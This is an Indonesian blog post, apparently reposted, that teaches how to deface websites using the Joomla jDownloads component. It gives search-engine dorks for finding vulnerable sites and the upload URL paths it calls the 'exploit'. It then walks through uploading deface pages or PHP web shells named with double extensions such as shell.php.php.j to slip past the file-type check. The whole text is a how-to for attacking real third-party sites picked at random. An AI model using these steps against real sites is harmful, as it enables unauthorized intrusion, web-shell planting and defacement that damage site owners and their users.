1.intext:"Powered by jDownloads"
2.intext:"submit file"
3.intext:"premited file type : jpg,png,gif"
4.inurl:/Images/Jdownloads
(gunakan imajinasimu, biar dapet yg vuln n verawan)
eXploit :
/index.php?option=com_jdownloads&Itemid=1&view=upload
atau
/index.php?option=com_jdownloads&Itemid=1&task=upload
Script Deface dengan ekstensi deface.html.j, deface.txt.j atau yang mau upload Shell silahkan siapkan shell.php.php.j
1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/index.php?option=com_jdownloads&Itemid=1&view=upload
3. Vulnerability ~ Muncul Form Seperti Gambar dibawah
4. Lalu isi data2 yang perlu, yang ada tanda merah di depan kotak Form., dan upload script deface atau shell kalian, contoh Gua upload file nue.php.php.j (upload dibagian screenshot)
5. Kalo sukses nanti Muncul icon +berwarna Hijau.
![]() |
| Note: gak semua file Shell bisa terbaca, jika tak terbaca langsung upload Script Deface kalean saja |
sumber : Tkj Cyber Art


Comments
Post a Comment